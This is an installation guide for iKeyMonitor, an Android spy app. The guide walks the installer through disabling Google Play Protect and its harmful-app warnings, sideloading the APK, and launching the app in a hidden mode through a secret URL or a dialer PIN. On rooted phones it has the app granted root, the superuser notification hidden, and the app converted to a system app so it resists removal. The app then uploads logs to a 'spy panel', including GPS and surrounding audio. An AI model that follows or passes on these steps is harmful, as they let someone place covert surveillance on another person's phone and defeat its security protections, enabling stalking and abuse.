Skip this step If you don’t have Google Play Installed(Eg: For China phones, Google Play is not installed by default).
Disable Google Play Protect
Settings > Google > Security > Scan device for security threats and Improve harmful app detection (1,2,3)
Set to “OFF“
Disable Google Play Protect Notification
On Android 7.x
Settings > Notifications > Google Play Store > Block all (1,2,3)
Set to “ON“
On Android 8.x
Settings > Apps & notifications > See all apps > Google Play Store > App notifications > High priority (1,2,3)
Set to “OFF“
If you have already installed iKeyMonitor and seen a notification “Uninstall harmful app“, then Long pressing the notification and Turn the notification to “OFF“.
1. Allow application installs from “unknown sources”
- Go to Settings > Security > tick “Unknown sources“
2. Tap on the downloaded “iKeyMonitor-Android.apk” file to install it
3. Open it after installation completes
If you choose “Done” after installation, find and tap on the iKeyMonitor icon on the device screen to launch the software.
4 ways to open iKeyMonitor:
Right after the installation, iKeyMonitor application is launched and starts working in a background mode. The icons which appear on the home screen and notification bar can be disabled from iKeyMonitor Wizard. View the guide. For better user experience, there are 2 options: either to keep them displayed on the home screen and notification bar of the monitored device or not.
- Visit https://ikeymonitor.com/openapp with the phone browser (Hidden Mode)
- Dial PIN #8888* with the call dialing pad (Hidden Mode)
- Tap on iKeyMonitor icon on notification bar (Visible Mode)
- Tap on iKeyMonitor icon on home screen (Visible Mode)
4. For rooted device, Grant iKeyMonitor root access and Convert it to System App
- For rooted device, grant iKeyMonitor root access and change Notification to Disabled in Supersu/Superuser.
- For rooted device, convert iKeyMonitor to system app from iKeyMonitor – Settings to make it harder to be killed or uninstalled. Reboot the device after converting.
1. Enable "Internet/Network Service" in "Accessibility Service" and "Usage Access"
- After you logged in, follow the popup dialogues to enable iKeyMonitor in Accessibility Service, Usage Access and Battery Optimization.
3. Essential Settings to Keep iKeyMonitor Running in Background
- iKeyMonitor can be disabled/killed by Power Saver or Task Cleaner of the Android system if you don’t configure the essential settings.
- Go to "Device Management", check if your device is connected to the spy panel and view logs after some minutes.
- iKeyMonitor uploads all the logs every 5 minutes when the device screen is ON. When the screen is Off(phone standby), only gps and surrounding logs will be uploaded.